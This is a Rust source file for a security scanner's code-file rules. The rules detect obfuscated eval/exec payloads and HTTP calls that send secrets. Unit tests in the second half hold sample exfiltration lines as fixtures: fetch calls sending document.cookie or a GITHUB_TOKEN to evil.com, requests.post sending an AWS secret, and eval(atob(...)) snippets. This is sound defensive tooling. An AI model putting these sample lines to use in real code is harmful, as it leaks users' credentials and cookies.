Skip to main content

tirith_core/rules/
codefile.rs

1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::rules::shared::SENSITIVE_KEY_VARS;
5use crate::script_analysis::detect_interpreter;
6use crate::verdict::{Evidence, Finding, RuleId, Severity};
7
/// Lowercase file extensions (without the leading dot) that mark a path as a
/// code file eligible for scanning: JavaScript/TypeScript, Python, shell,
/// PowerShell, Ruby, PHP and Perl sources.
const CODE_EXTENSIONS: &[&str] = &[
    "js", "mjs", "cjs", "ts", "mts", "jsx", "tsx", "py", "pyw", "sh", "bash", "zsh", "fish", "ps1",
    "psm1", "rb", "php", "pl",
];
13
14/// Returns true if the file is a code file that should be scanned.
15pub fn is_code_file(path: Option<&str>, content: &str) -> bool {
16    if let Some(p) = path {
17        let lower = p.to_lowercase();
18        if let Some(ext) = lower.rsplit('.').next() {
19            if CODE_EXTENSIONS.contains(&ext) {
20                return true;
21            }
22        }
23    }
24    // Extensionless: require shebang
25    if content.starts_with("#!") {
26        let interp = detect_interpreter(content);
27        if !interp.is_empty() {
28            return true;
29        }
30    }
31    false
32}
33
34/// Run code file pattern scanning rules.
35pub fn check(input: &str, file_path: Option<&str>) -> Vec<Finding> {
36    let mut findings = Vec::new();
37
38    check_dynamic_code_execution(input, &mut findings);
39    check_obfuscated_payload(input, &mut findings);
40    check_suspicious_code_exfiltration(input, file_path, &mut findings);
41
42    findings
43}
44
45// ---------------------------------------------------------------------------
46// DynamicCodeExecution — eval/exec near decode/obfuscation tokens (~500 chars)
47// ---------------------------------------------------------------------------
48
49static DYNAMIC_CODE_PAIRS: Lazy<Vec<(Regex, Regex, &'static str)>> = Lazy::new(|| {
50    vec![
51        // JS: eval( near atob(
52        (
53            Regex::new(r"eval\s*\(").unwrap(),
54            Regex::new(r"atob\s*\(").unwrap(),
55            "eval() near atob()",
56        ),
57        // JS: eval( near String.fromCharCode
58        (
59            Regex::new(r"eval\s*\(").unwrap(),
60            Regex::new(r"String\.fromCharCode").unwrap(),
61            "eval() near String.fromCharCode()",
62        ),
63        // JS: new Function( near encoded content
64        (
65            Regex::new(r"new\s+Function\s*\(").unwrap(),
66            Regex::new(r"(?:atob|String\.fromCharCode|Buffer\.from)\s*\(").unwrap(),
67            "new Function() near encoded content",
68        ),
69        // Python: exec( near b64decode/base64.b64decode
70        (
71            Regex::new(r"exec\s*\(").unwrap(),
72            Regex::new(r"b(?:ase)?64[._]?b?64decode|b64decode").unwrap(),
73            "exec() near b64decode()",
74        ),
75        // Python: exec(compile(
76        (
77            Regex::new(r"exec\s*\(\s*compile\s*\(").unwrap(),
78            Regex::new(r"compile\s*\(").unwrap(),
79            "exec(compile())",
80        ),
81        // Python: exec(__import__(
82        (
83            Regex::new(r"exec\s*\(\s*__import__\s*\(").unwrap(),
84            Regex::new(r"__import__\s*\(").unwrap(),
85            "exec(__import__())",
86        ),
87    ]
88});
89
/// Number of bytes inspected on each side of a match when looking for the
/// companion pattern that makes the match suspicious.
const PROXIMITY_WINDOW: usize = 500;
91
92fn check_dynamic_code_execution(input: &str, findings: &mut Vec<Finding>) {
93    for (pattern_a, pattern_b, description) in DYNAMIC_CODE_PAIRS.iter() {
94        for mat_a in pattern_a.find_iter(input) {
95            let start = mat_a.start().saturating_sub(PROXIMITY_WINDOW);
96            let end = (mat_a.end() + PROXIMITY_WINDOW).min(input.len());
97            let window = &input[start..end];
98
99            if pattern_b.is_match(window) {
100                findings.push(Finding {
101                    rule_id: RuleId::DynamicCodeExecution,
102                    severity: Severity::Medium,
103                    title: "Dynamic code execution with obfuscation".to_string(),
104                    description: format!("Detected {description} in close proximity"),
105                    evidence: vec![Evidence::CommandPattern {
106                        pattern: description.to_string(),
107                        matched: truncate(
108                            &input[mat_a.start()..safe_end(input, mat_a.end() + 80)],
109                            120,
110                        ),
111                    }],
112                    human_view: None,
113                    agent_view: None,
114                    mitre_id: None,
115                    custom_rule_id: None,
116                });
117                return; // One finding per file is enough
118            }
119        }
120    }
121}
122
123// ---------------------------------------------------------------------------
124// ObfuscatedPayload — long base64 inside decode call near eval/exec
125// ---------------------------------------------------------------------------
126
/// Matches a decode call whose first argument is a string literal starting with
/// at least 40 base64-alphabet characters: `atob("…`, `b64decode("…` (optionally
/// a `b"…"` bytes literal) or `Buffer.from("…`. Capture group 1 holds the run
/// of base64 characters.
static OBFUSCATED_DECODE_CALL: Lazy<Regex> = Lazy::new(|| {
    Regex::new(
        r#"(?:atob\s*\(\s*["']|b64decode\s*\(\s*b?["']|Buffer\.from\s*\(\s*["'])([A-Za-z0-9+/=]{40,})"#,
    )
    .unwrap()
});
133
/// Matches `eval(`, `exec(` or `Function(` (whitespace allowed before the
/// parenthesis). There is no leading word boundary, so identifiers that merely
/// end in one of these names match as well.
static EXEC_EVAL_NEARBY: Lazy<Regex> =
    Lazy::new(|| Regex::new(r"(?:eval|exec|Function)\s*\(").unwrap());
136
137fn check_obfuscated_payload(input: &str, findings: &mut Vec<Finding>) {
138    for cap in OBFUSCATED_DECODE_CALL.captures_iter(input) {
139        let full_match = cap.get(0).unwrap();
140        let start = full_match.start().saturating_sub(PROXIMITY_WINDOW);
141        let end = (full_match.end() + PROXIMITY_WINDOW).min(input.len());
142        let window = &input[start..end];
143
144        if EXEC_EVAL_NEARBY.is_match(window) {
145            findings.push(Finding {
146                rule_id: RuleId::ObfuscatedPayload,
147                severity: Severity::Medium,
148                title: "Obfuscated payload with decode-execute".to_string(),
149                description:
150                    "Long base64 string decoded and executed — likely obfuscated malicious payload"
151                        .to_string(),
152                evidence: vec![Evidence::CommandPattern {
153                    pattern: "base64 decode + eval/exec".to_string(),
154                    matched: truncate(full_match.as_str(), 120),
155                }],
156                human_view: None,
157                agent_view: None,
158                mitre_id: None,
159                custom_rule_id: None,
160            });
161            return;
162        }
163    }
164}
165
166// ---------------------------------------------------------------------------
167// SuspiciousCodeExfiltration — HTTP call with sensitive data in call args
168// ---------------------------------------------------------------------------
169
/// JS HTTP call patterns: `fetch(`, `axios.<method>(` and `.send(`.
/// Every alternative ends on the opening `(`, so a match's end offset is the
/// first byte of the call's argument list.
static JS_HTTP_CALL: Lazy<Regex> =
    Lazy::new(|| Regex::new(r"(?:fetch\s*\(|axios\.\w+\s*\(|\.send\s*\()").unwrap());
173
/// Python HTTP call patterns: `requests.post(`, `requests.get(`,
/// `requests.put(` and `urllib.request.<name>(`.
/// Every alternative ends on the opening `(`, so a match's end offset is the
/// first byte of the call's argument list.
static PY_HTTP_CALL: Lazy<Regex> = Lazy::new(|| {
    Regex::new(r"(?:requests\.(?:post|get|put)\s*\(|urllib\.request\.\w+\s*\()").unwrap()
});
178
179/// Sensitive JS references: document.cookie or process.env.SENSITIVE_KEY
180static JS_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
181    let keys: Vec<String> = SENSITIVE_KEY_VARS
182        .iter()
183        .map(|k| regex::escape(k))
184        .collect();
185    Regex::new(&format!(
186        r"(?:document\.cookie|process\.env\.(?:{}))",
187        keys.join("|")
188    ))
189    .unwrap()
190});
191
192/// Sensitive Python references: os.environ["SENSITIVE_KEY"] or open("/etc/passwd")
193static PY_SENSITIVE: Lazy<Regex> = Lazy::new(|| {
194    let keys: Vec<String> = SENSITIVE_KEY_VARS
195        .iter()
196        .map(|k| regex::escape(k))
197        .collect();
198    Regex::new(&format!(
199        r#"(?:os\.environ\[["'](?:{})["']\]|open\s*\(\s*["']/etc/(?:passwd|shadow)["'][^)]*\))"#,
200        keys.join("|")
201    ))
202    .unwrap()
203});
204
/// Property keywords that indicate data/send context (fire the finding):
/// `body`, `data`, `json`, `params` or `payload`, case-insensitive, followed by
/// `:` or `=`. The pattern is unanchored, so it also matches when the keyword
/// is the tail of a longer identifier.
static SEND_PROPS: Lazy<Regex> =
    Lazy::new(|| Regex::new(r"(?i)(?:body|data|json|params|payload)\s*[:=]").unwrap());
208
/// Any property-like keyword (`word:` or `word=`, whitespace allowed before the
/// separator) — used to detect when a secret is inside an unknown property
/// (like `meta:`) that is NOT a send context.
static GENERIC_PROP: Lazy<Regex> = Lazy::new(|| Regex::new(r"\b\w+\s*[:=]").unwrap());
212
/// Find the end of a call's argument list by matching the closing delimiter.
///
/// `open_pos` must point to the byte AFTER the opening `(`.
/// Returns the byte position just past the matching closing bracket, or `None`
/// if the input ends before the brackets balance.
///
/// Handles: nested brackets (`()`, `[]`, `{}` are counted interchangeably),
/// string literals (`"`, `'`, `` ` ``) with backslash escapes,
/// block comments (`/* ... */`), line comments (`//`, `#`), and
/// JS regex literals (heuristic: `/` preceded by a non-value byte).
///
/// An unterminated block comment swallows the rest of the input, so a bracket
/// inside it can never close the call.
fn find_call_end(input: &[u8], open_pos: usize) -> Option<usize> {
    let mut depth: u32 = 1;
    let mut i = open_pos;
    let mut in_string: Option<u8> = None;

    while i < input.len() && depth > 0 {
        let b = input[i];
        match in_string {
            Some(q) => {
                if b == b'\\' && i + 1 < input.len() {
                    i += 2; // skip escaped char
                    continue;
                }
                if b == q {
                    in_string = None;
                }
            }
            None => {
                // Block comment: /* ... */
                if b == b'/' && i + 1 < input.len() && input[i + 1] == b'*' {
                    i = match input[i + 2..].windows(2).position(|w| w == b"*/") {
                        // Resume right after the closing `*/`.
                        Some(offset) => i + 2 + offset + 2,
                        // Unterminated: everything up to the end is comment text.
                        None => input.len(),
                    };
                    continue;
                }
                // Line comment: // or #
                if (b == b'/' && i + 1 < input.len() && input[i + 1] == b'/') || b == b'#' {
                    while i < input.len() && input[i] != b'\n' {
                        i += 1;
                    }
                    continue;
                }
                // JS regex literal: / preceded by a non-value token
                // Skip whitespace to find previous significant byte.
                if b == b'/' {
                    let prev = {
                        let mut j = i;
                        while j > 0 && matches!(input[j - 1], b' ' | b'\t' | b'\n' | b'\r') {
                            j -= 1;
                        }
                        if j > 0 {
                            input[j - 1]
                        } else {
                            0
                        }
                    };
                    // After a value-like byte the slash is treated as an operator.
                    let is_division = prev.is_ascii_alphanumeric()
                        || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
                    if !is_division {
                        i += 1; // skip opening /
                        while i < input.len() && input[i] != b'/' {
                            if input[i] == b'\\' && i + 1 < input.len() {
                                i += 1; // skip escaped char in regex
                            }
                            i += 1;
                        }
                        if i < input.len() {
                            i += 1; // skip closing /
                        }
                        continue;
                    }
                }
                match b {
                    b'"' | b'\'' | b'`' => in_string = Some(b),
                    b'(' | b'[' | b'{' => depth += 1,
                    // The loop exits as soon as depth reaches 0, so this cannot underflow.
                    b')' | b']' | b'}' => depth -= 1,
                    _ => {}
                }
            }
        }
        i += 1;
    }
    if depth == 0 {
        Some(i)
    } else {
        None
    }
}
303
304fn check_suspicious_code_exfiltration(
305    input: &str,
306    file_path: Option<&str>,
307    findings: &mut Vec<Finding>,
308) {
309    let is_js = file_path
310        .map(|p| {
311            let lower = p.to_lowercase();
312            lower.ends_with(".js")
313                || lower.ends_with(".mjs")
314                || lower.ends_with(".cjs")
315                || lower.ends_with(".ts")
316                || lower.ends_with(".mts")
317                || lower.ends_with(".jsx")
318                || lower.ends_with(".tsx")
319        })
320        .unwrap_or(false);
321
322    let is_py = file_path
323        .map(|p| {
324            let lower = p.to_lowercase();
325            lower.ends_with(".py") || lower.ends_with(".pyw")
326        })
327        .unwrap_or(false);
328
329    // For extensionless shebangs, detect from content
330    let (is_js, is_py) = if !is_js && !is_py && file_path.is_some() {
331        let interp = detect_interpreter(input);
332        (
333            matches!(interp, "node" | "deno" | "bun"),
334            matches!(interp, "python" | "python3" | "python2"),
335        )
336    } else {
337        (is_js, is_py)
338    };
339
340    if is_js {
341        check_js_exfiltration(input, findings);
342    }
343    if is_py {
344        check_py_exfiltration(input, findings);
345    }
346}
347
/// Walk bytes up to `pos` tracking strings, comments, and bracket depth.
///
/// Returns `(depth, is_code)` at the target position:
/// - `depth` is the bracket nesting (`()`, `[]`, `{}` counted interchangeably)
///   accumulated before `pos`; it can go negative on unbalanced input.
/// - `is_code` is `false` when `pos` lies inside a string literal, a comment
///   (`/* */`, `//`, `#`) or a JS regex literal, and `true` otherwise.
///
/// If `pos` is at or past the end of `s`, the state at the end of input is
/// returned.
fn code_context_at(s: &[u8], pos: usize) -> (i32, bool) {
    let mut depth: i32 = 0;
    let mut in_string: Option<u8> = None;
    let mut i = 0;

    // Invariant: `i <= pos` at the top of every iteration (for an in-range
    // `pos`), so the target is never stepped over without being classified.
    while i < s.len() {
        if i == pos {
            return (depth, in_string.is_none());
        }
        let b = s[i];

        if let Some(q) = in_string {
            if b == b'\\' && i + 1 < s.len() {
                // The escaped byte is string content too.
                if i + 1 == pos {
                    return (depth, false);
                }
                i += 2;
                continue;
            }
            if b == q {
                in_string = None;
            }
            i += 1;
            continue;
        }

        // For comments and regex literals, compute the exclusive end of the
        // non-code region that starts at `i`.
        let region_end = if b == b'/' && i + 1 < s.len() && s[i + 1] == b'*' {
            // Block comment: runs through the closing `*/`, or to the end of
            // input when it is never closed.
            Some(match s[i + 2..].windows(2).position(|w| w == b"*/") {
                Some(offset) => i + 2 + offset + 2,
                None => s.len(),
            })
        } else if (b == b'/' && i + 1 < s.len() && s[i + 1] == b'/') || b == b'#' {
            // Line comment: runs up to (not including) the next newline.
            Some(
                s[i..]
                    .iter()
                    .position(|&c| c == b'\n')
                    .map_or(s.len(), |offset| i + offset),
            )
        } else if b == b'/' {
            // JS regex literal: / preceded by a non-value token.
            // The previous significant byte is the last non-whitespace byte.
            let prev = s[..i]
                .iter()
                .rev()
                .copied()
                .find(|c| !matches!(c, b' ' | b'\t' | b'\n' | b'\r'))
                .unwrap_or(0);
            let is_division = prev.is_ascii_alphanumeric()
                || matches!(prev, b')' | b']' | b'_' | b'$' | b'+' | b'-');
            if is_division {
                None
            } else {
                let mut j = i + 1; // skip opening /
                while j < s.len() && s[j] != b'/' {
                    if s[j] == b'\\' && j + 1 < s.len() {
                        j += 1; // skip escaped char in regex
                    }
                    j += 1;
                }
                if j < s.len() {
                    j += 1; // include closing /
                }
                Some(j)
            }
        } else {
            None
        };

        if let Some(end) = region_end {
            // `pos > i` here, so `pos < end` means the target is inside the region.
            if pos < end {
                return (depth, false);
            }
            i = end;
            continue;
        }

        match b {
            b'"' | b'\'' | b'`' => in_string = Some(b),
            b'(' | b'[' | b'{' => depth += 1,
            b')' | b']' | b'}' => depth -= 1,
            _ => {}
        }
        i += 1;
    }
    (depth, in_string.is_none())
}
441
442/// Decide whether to suppress the exfil finding for a secret at `pos_in_span`
443/// within the HTTP call's argument span.
444///
445/// Logic: find the nearest shallow (depth ≤ 1), in-code property keyword
446/// (`word:` or `word=`) before the secret.
447/// - If it's a SEND keyword (body/data/json/params/payload) → fire (return false)
448/// - If it's anything else (headers, meta, unknown) → suppress (return true)
449/// - If NO property keyword at all → secret is in direct-argument / URL-concat
450///   context → fire (return false)
451fn should_suppress_exfil(arg_span: &str, pos_in_span: usize) -> bool {
452    let before = &arg_span[..pos_in_span];
453    let bytes = before.as_bytes();
454
455    // Find the nearest property-like keyword at shallow depth in actual code.
456    let nearest_prop = GENERIC_PROP
457        .find_iter(before)
458        .filter(|m| {
459            let (depth, is_code) = code_context_at(bytes, m.start());
460            depth <= 1 && is_code
461        })
462        .last();
463
464    match nearest_prop {
465        Some(m) => {
466            // If the nearest property is a recognized send keyword → fire
467            if SEND_PROPS.is_match(m.as_str()) {
468                return false;
469            }
470            // Otherwise (headers, auth, meta, token, unknown) → suppress
471            true
472        }
473        // No property keyword at all → direct argument / URL context → fire
474        None => false,
475    }
476}
477
478fn emit_exfil_finding(findings: &mut Vec<Finding>, call_snippet: &str, sens_str: &str) {
479    findings.push(Finding {
480        rule_id: RuleId::SuspiciousCodeExfiltration,
481        severity: Severity::Medium,
482        title: "Suspicious code exfiltration pattern".to_string(),
483        description: format!(
484            "HTTP call passes sensitive data '{}' as argument — potential data exfiltration",
485            sens_str
486        ),
487        evidence: vec![Evidence::CommandPattern {
488            pattern: "sensitive data inside HTTP call arguments".to_string(),
489            matched: truncate(call_snippet, 120),
490        }],
491        human_view: None,
492        agent_view: None,
493        mitre_id: None,
494        custom_rule_id: None,
495    });
496}
497
498fn check_js_exfiltration(input: &str, findings: &mut Vec<Finding>) {
499    let bytes = input.as_bytes();
500    for http_match in JS_HTTP_CALL.find_iter(input) {
501        // Match ends right after '(' — find the matching ')'
502        let call_end = match find_call_end(bytes, http_match.end()) {
503            Some(end) => end,
504            None => continue,
505        };
506        // The argument span is everything between '(' and ')'
507        let arg_span = &input[http_match.end()..call_end.saturating_sub(1)];
508
509        for sens_match in JS_SENSITIVE.find_iter(arg_span) {
510            // Only fire if the secret is in a send-position context
511            if should_suppress_exfil(arg_span, sens_match.start()) {
512                continue;
513            }
514            let snippet = &input[http_match.start()..call_end.min(input.len())];
515            emit_exfil_finding(findings, snippet, sens_match.as_str());
516            return;
517        }
518    }
519}
520
521fn check_py_exfiltration(input: &str, findings: &mut Vec<Finding>) {
522    let bytes = input.as_bytes();
523    for http_match in PY_HTTP_CALL.find_iter(input) {
524        let call_end = match find_call_end(bytes, http_match.end()) {
525            Some(end) => end,
526            None => continue,
527        };
528        let arg_span = &input[http_match.end()..call_end.saturating_sub(1)];
529
530        for sens_match in PY_SENSITIVE.find_iter(arg_span) {
531            if should_suppress_exfil(arg_span, sens_match.start()) {
532                continue;
533            }
534            let snippet = &input[http_match.start()..call_end.min(input.len())];
535            emit_exfil_finding(findings, snippet, sens_match.as_str());
536            return;
537        }
538    }
539}
540
/// Largest byte index that is both ≤ `target` (clamped to `s.len()`) and a
/// UTF-8 char boundary of `s`.
fn safe_end(s: &str, target: usize) -> usize {
    let upper = target.min(s.len());
    // Index 0 is always a boundary, so the search cannot come up empty.
    (0..=upper)
        .rev()
        .find(|&idx| s.is_char_boundary(idx))
        .unwrap_or(0)
}
551
/// Return `s` unchanged when it has at most `max` characters; otherwise return
/// its first `max` characters followed by `...`.
fn truncate(s: &str, max: usize) -> String {
    // The character at index `max` exists only when `s` is longer than `max`;
    // its byte offset is exactly where the kept prefix ends.
    match s.char_indices().nth(max) {
        Some((cut, _)) => format!("{}...", &s[..cut]),
        None => s.to_string(),
    }
}
560
561#[cfg(test)]
562mod tests {
563    use super::*;
564
565    #[test]
566    fn test_is_code_file_by_extension() {
567        assert!(is_code_file(Some("test.js"), ""));
568        assert!(is_code_file(Some("test.py"), ""));
569        assert!(is_code_file(Some("test.ts"), ""));
570        assert!(is_code_file(Some("test.sh"), ""));
571        assert!(is_code_file(Some("test.ps1"), ""));
572        assert!(!is_code_file(Some("notes.txt"), ""));
573        assert!(!is_code_file(Some("config.json"), ""));
574    }
575
576    #[test]
577    fn test_is_code_file_shebang() {
578        assert!(is_code_file(
579            Some("script"),
580            "#!/usr/bin/env python3\nimport os"
581        ));
582        assert!(is_code_file(Some("run"), "#!/bin/bash\necho hi"));
583        assert!(!is_code_file(Some("data"), "just some text"));
584    }
585
586    #[test]
587    fn test_dynamic_code_eval_atob() {
588        let input = r#"var x = eval(atob("SGVsbG8gV29ybGQ="));"#;
589        let findings = check(input, Some("test.js"));
590        assert!(
591            findings
592                .iter()
593                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
594            "eval+atob should fire DynamicCodeExecution"
595        );
596    }
597
598    #[test]
599    fn test_dynamic_code_exec_b64decode() {
600        let input = r#"exec(b64decode("SGVsbG8gV29ybGQ="))"#;
601        let findings = check(input, Some("test.py"));
602        assert!(
603            findings
604                .iter()
605                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
606            "exec+b64decode should fire DynamicCodeExecution"
607        );
608    }
609
610    #[test]
611    fn test_bare_eval_no_fire() {
612        let input = "eval(someVar);";
613        let findings = check(input, Some("test.js"));
614        assert!(
615            !findings
616                .iter()
617                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
618            "bare eval should not fire"
619        );
620    }
621
622    #[test]
623    fn test_eval_atob_distant_no_fire() {
624        let padding = "x".repeat(600);
625        let input = format!("eval(something);\n{padding}\natob('SGVsbG8=');");
626        let findings = check(&input, Some("test.js"));
627        assert!(
628            !findings
629                .iter()
630                .any(|f| f.rule_id == RuleId::DynamicCodeExecution),
631            "distant eval+atob should not fire"
632        );
633    }
634
635    #[test]
636    fn test_obfuscated_payload() {
637        let b64 = "A".repeat(50);
638        let input = format!(r#"eval(atob("{b64}"))"#);
639        let findings = check(&input, Some("test.js"));
640        assert!(
641            findings
642                .iter()
643                .any(|f| f.rule_id == RuleId::ObfuscatedPayload),
644            "long base64 in atob near eval should fire ObfuscatedPayload"
645        );
646    }
647
648    #[test]
649    fn test_exfil_fetch_cookie() {
650        let input = r#"fetch("https://evil.com/?d=" + document.cookie)"#;
651        let findings = check(input, Some("test.js"));
652        assert!(
653            findings
654                .iter()
655                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
656            "fetch + document.cookie should fire"
657        );
658    }
659
660    #[test]
661    fn test_exfil_fetch_env_token() {
662        let input = r#"fetch(url, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
663        let findings = check(input, Some("test.js"));
664        assert!(
665            findings
666                .iter()
667                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
668            "fetch + process.env.GITHUB_TOKEN in body should fire"
669        );
670    }
671
672    #[test]
673    fn test_exfil_auth_header_no_fire() {
674        let input = r#"fetch("/api/login", {headers: {"Authorization": "Bearer " + process.env.GITHUB_TOKEN}})"#;
675        let findings = check(input, Some("test.js"));
676        assert!(
677            !findings
678                .iter()
679                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
680            "Authorization header pattern should NOT fire"
681        );
682    }
683
684    #[test]
685    fn test_exfil_python_requests() {
686        let input = r#"requests.post(url, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
687        let findings = check(input, Some("test.py"));
688        assert!(
689            findings
690                .iter()
691                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
692            "requests.post + secret env should fire"
693        );
694    }
695
696    #[test]
697    fn test_normal_fetch_no_fire() {
698        let input = r#"fetch("/api/data").then(r => r.json())"#;
699        let findings = check(input, Some("test.js"));
700        assert!(
701            !findings
702                .iter()
703                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
704            "normal fetch should not fire"
705        );
706    }
707
708    #[test]
709    fn test_not_code_file_no_fire() {
710        let input = r#"eval(atob("SGVsbG8gV29ybGQ="));"#;
711        assert!(!is_code_file(Some("notes.txt"), input));
712    }
713
714    #[test]
715    fn test_internal_post_body_no_fire() {
716        let input = r#"requests.post("https://internal-api.example.com/log", json={"event": "login", "user": username})"#;
717        let findings = check(input, Some("test.py"));
718        assert!(
719            !findings
720                .iter()
721                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
722            "internal API POST without sensitive data should not fire"
723        );
724    }
725
726    // -----------------------------------------------------------------------
727    // Non-send properties: secret in unknown kwargs must NOT fire
728    // -----------------------------------------------------------------------
729
730    #[test]
731    fn test_exfil_js_meta_property_no_fire() {
732        let input = r#"fetch(url, {meta: process.env.GITHUB_TOKEN})"#;
733        let findings = check(input, Some("test.js"));
734        assert!(
735            !findings
736                .iter()
737                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
738            "secret in non-send property 'meta:' should NOT fire"
739        );
740    }
741
742    #[test]
743    fn test_exfil_python_meta_kwarg_no_fire() {
744        let input = r#"requests.post(url, meta=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
745        let findings = check(input, Some("test.py"));
746        assert!(
747            !findings
748                .iter()
749                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
750            "secret in non-send kwarg 'meta=' should NOT fire"
751        );
752    }
753
754    #[test]
755    fn test_exfil_js_token_property_no_fire() {
756        let input = r#"fetch(url, {token: process.env.GITHUB_TOKEN})"#;
757        let findings = check(input, Some("test.js"));
758        assert!(
759            !findings
760                .iter()
761                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
762            "secret in non-send property 'token:' should NOT fire"
763        );
764    }
765
766    #[test]
767    fn test_exfil_query_concat_fires() {
768        let input = r#"fetch("https://evil.com/c?token=" + process.env.GITHUB_TOKEN)"#;
769        let findings = check(input, Some("test.js"));
770        assert!(
771            findings
772                .iter()
773                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
774            "URL query concat with secret should fire"
775        );
776    }
777
778    // -----------------------------------------------------------------------
779    // False-positive boundary: secret must be INSIDE the HTTP call's args
780    // -----------------------------------------------------------------------
781
782    #[test]
783    fn test_exfil_separate_statement_no_fire() {
784        // Secret in a separate statement, not passed to the fetch call
785        let input = r#"fetch(url); const payload = { token: process.env.GITHUB_TOKEN };"#;
786        let findings = check(input, Some("test.js"));
787        assert!(
788            !findings
789                .iter()
790                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
791            "secret in separate statement (not in call args) should NOT fire"
792        );
793    }
794
795    #[test]
796    fn test_exfil_unrelated_body_object_no_fire() {
797        // body: keyword exists nearby but belongs to unrelated local object
798        let input = r#"fetch(url); const opts = { body: bodyVar }; const token = process.env.GITHUB_TOKEN;"#;
799        let findings = check(input, Some("test.js"));
800        assert!(
801            !findings
802                .iter()
803                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
804            "unrelated body object near fetch should NOT fire"
805        );
806    }
807
808    #[test]
809    fn test_exfil_document_cookie_not_sent_no_fire() {
810        // document.cookie is read but not passed as argument to the fetch call
811        let input = r#"fetch(url); console.log(document.cookie);"#;
812        let findings = check(input, Some("test.js"));
813        assert!(
814            !findings
815                .iter()
816                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
817            "document.cookie outside call args should NOT fire"
818        );
819    }
820
821    #[test]
822    fn test_exfil_document_cookie_inside_call_fires() {
823        // document.cookie IS passed inside the fetch call's args
824        let input = r#"fetch("https://evil.com/?c=" + document.cookie)"#;
825        let findings = check(input, Some("test.js"));
826        assert!(
827            findings
828                .iter()
829                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
830            "document.cookie inside call args should fire"
831        );
832    }
833
834    // -----------------------------------------------------------------------
835    // Parser edge cases: comments and regex literals inside call args
836    // -----------------------------------------------------------------------
837
838    #[test]
839    fn test_exfil_block_comment_in_args() {
840        // `)` inside a block comment must not terminate the arg span
841        let input =
842            r#"fetch(url /* ) */, {body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
843        let findings = check(input, Some("test.js"));
844        assert!(
845            findings
846                .iter()
847                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
848            "block comment with ) inside call args should not break parser"
849        );
850    }
851
852    #[test]
853    fn test_exfil_python_line_comment_in_args() {
854        // `#` line comment with `)` must not terminate the arg span
855        let input = "requests.post(url, # )\n    data=os.environ[\"AWS_SECRET_ACCESS_KEY\"])";
856        let findings = check(input, Some("test.py"));
857        assert!(
858            findings
859                .iter()
860                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
861            "Python # comment with ) inside call args should not break parser"
862        );
863    }
864
865    #[test]
866    fn test_exfil_js_regex_literal_in_args() {
867        // regex literal /\(/ must not throw off delimiter counting
868        let input = r#"fetch(url, {body: /\(/, json: process.env.GITHUB_TOKEN})"#;
869        let findings = check(input, Some("test.js"));
870        assert!(
871            findings
872                .iter()
873                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
874            "JS regex literal with ( should not break parser"
875        );
876    }
877
878    #[test]
879    fn test_find_call_end_block_comment() {
880        let input = b"url /* ) */, data)";
881        assert_eq!(find_call_end(input, 0), Some(18));
882    }
883
884    #[test]
885    fn test_find_call_end_line_comment() {
886        let input = b"url, # )\n    data)";
887        assert_eq!(find_call_end(input, 0), Some(18));
888    }
889
890    #[test]
891    fn test_find_call_end_regex_literal() {
892        let input = br#"url, {body: /\(/, val})"#;
893        assert_eq!(find_call_end(input, 0), Some(23));
894    }
895
896    // -----------------------------------------------------------------------
897    // Header suppression: headers before body must not suppress body secrets
898    // -----------------------------------------------------------------------
899
900    #[test]
901    fn test_exfil_headers_then_body_fires() {
902        let input = r#"fetch(url, {headers: {Authorization: auth}, body: JSON.stringify({key: process.env.GITHUB_TOKEN})})"#;
903        let findings = check(input, Some("test.js"));
904        assert!(
905            findings
906                .iter()
907                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
908            "secret in body after headers in same call should fire"
909        );
910    }
911
912    #[test]
913    fn test_exfil_python_headers_then_data_fires() {
914        let input =
915            r#"requests.post(url, headers=headers, data=os.environ["AWS_SECRET_ACCESS_KEY"])"#;
916        let findings = check(input, Some("test.py"));
917        assert!(
918            findings
919                .iter()
920                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
921            "secret in data= after headers= in same call should fire"
922        );
923    }
924
925    // -----------------------------------------------------------------------
926    // Division inside call args must not truncate the span
927    // -----------------------------------------------------------------------
928
929    #[test]
930    fn test_exfil_division_in_args_fires() {
931        let input = r#"fetch(url, {body: 1 / 2, json: process.env.GITHUB_TOKEN})"#;
932        let findings = check(input, Some("test.js"));
933        assert!(
934            findings
935                .iter()
936                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
937            "division operator in call args should not break parser"
938        );
939    }
940
941    #[test]
942    fn test_exfil_paren_division_in_args_fires() {
943        let input = r#"fetch(url, {body: (a / b), json: process.env.GITHUB_TOKEN})"#;
944        let findings = check(input, Some("test.js"));
945        assert!(
946            findings
947                .iter()
948                .any(|f| f.rule_id == RuleId::SuspiciousCodeExfiltration),
949            "parenthesized division in call args should not break parser"
950        );
951    }
952
953    #[test]
954    fn test_find_call_end_division() {
955        let input = b"url, {body: 1 / 2, val})";
956        assert_eq!(find_call_end(input, 0), Some(24));
957    }
958
959    // -----------------------------------------------------------------------
